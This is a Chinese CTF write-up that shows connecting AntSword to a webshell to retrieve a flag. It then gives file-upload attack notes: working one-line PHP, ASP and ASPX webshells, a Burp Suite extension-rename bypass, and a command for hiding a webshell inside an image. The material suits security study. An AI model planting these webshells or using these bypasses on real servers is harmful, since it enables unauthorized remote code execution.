![在这里插入图片描述](https://img-blog.csdnimg.cn/20210705155323808.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0Nyb3RaWg==,size_16,color_FFFFFF,t_70)
打开一看结合题目,就是连接一下菜刀蚁剑,菜刀没用过只有蚁剑,下面用蚁剑实现
![在这里插入图片描述](https://img-blog.csdnimg.cn/2021070515534628.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0Nyb3RaWg==,size_16,color_FFFFFF,t_70)
设置好URL和链接密码
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210705155358114.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0Nyb3RaWg==,size_16,color_FFFFFF,t_70)
找到flag文件
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210705155407350.png)
打开后找到flag
文件上传漏洞
一句话木马:
php
<?php echo @eval($_POST['shell']);?>
Asp
<%execute(request(“value”))%>
Aspx
<%@ Page Language=“Jscript”%>
<%eval(Request.Item[“value”])%>
前端判断文件后缀名可以Burp Suite配置好Proxy -> Options,并在Proxy->Intercept->Intercept is on,浏览器设置代理为Options中的配置,先把shell.php后缀改为jpg,然后提交,再filename中把文件shell.jpg后缀改为shell.php
图片马
一般直接上传木马文件都会被过滤拦截,这时候就需要用到图片马。
所谓图片马,就是将一句话木马与图片相结合,使得图片中包含代码。
制作:
一个正常图片,一个木马文件,内容为php一句话木马,在命令框里
copy pic.jpg/b + php木马.php/a webshell.jpg生成图片马